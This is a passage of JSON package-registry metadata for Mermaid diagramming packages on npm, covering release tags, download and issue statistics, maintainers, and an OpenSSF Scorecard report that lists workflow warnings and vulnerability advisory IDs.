i/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.353Z","dependent_packages_count":2,"downloads":318253,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":6.2386479832091055,"dependent_repos_count":10.298590216448614,"dependent_packages_count":8.834682360908511,"stargazers_count":0.079207077177571,"forks_count":0.4639191583309113,"docker_downloads_count":null,"average":5.183009359214942},"purl":"pkg:npm/%40mermaid-js/mermaid-zenuml","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mermaid-js/mermaid-zenuml","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mermaid-js/mermaid-zenuml","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mermaid-js/mermaid-zenuml/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fmermaid-zenuml/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fmermaid-zenuml/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fmermaid-zenuml/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Fmermaid-zenuml/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2023-07-06T07:26:50.587Z","updated_at":"2023-07-06T07:26:50.587Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2023-07-06T07:26:50.626Z","updated_at":"2023-07-06T07:26:50.626Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ugnikalnis","login":"ugnikalnis","name":null,"email":"mindaugas.laganeckas@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~ugnikalnis","role":null,"created_at":"2023-07-06T07:26:50.671Z","updated_at":"2023-07-06T07:26:50.671Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ugnikalnis/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2023-07-06T07:26:50.808Z","updated_at":"2023-07-06T07:26:50.808Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2023-07-06T07:26:50.529Z","updated_at":"2023-07-06T07:26:50.529Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2023-11-06T16:17:31.531Z","updated_at":"2023-11-06T16:17:31.531Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11396500,"name":"@jeswr/mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, mindmaps, sequence diagrams, class diagrams, gantt charts, git graphs and more.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph","mindmap","packet diagram","c4 diagram","er diagram","pie chart","pie diagram","quadrant chart","requirement diagram","graph"],"namespace":"jeswr","versions_count":5,"first_release_published_at":"2025-03-02T14:57:55.594Z","latest_release_published_at":"2025-03-04T13:18:46.551Z","latest_release_number":"11.0.0-alpha.12","last_synced_at":"2025-09-01T12:55:58.683Z","created_at":"2025-03-02T14:59:37.084Z","updated_at":"2025-09-01T14:17:50.396Z","registry_url":"https://www.npmjs.com/package/@jeswr/mermaid","install_command":"npm install @jeswr/mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"11.0.0-alpha.12"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://r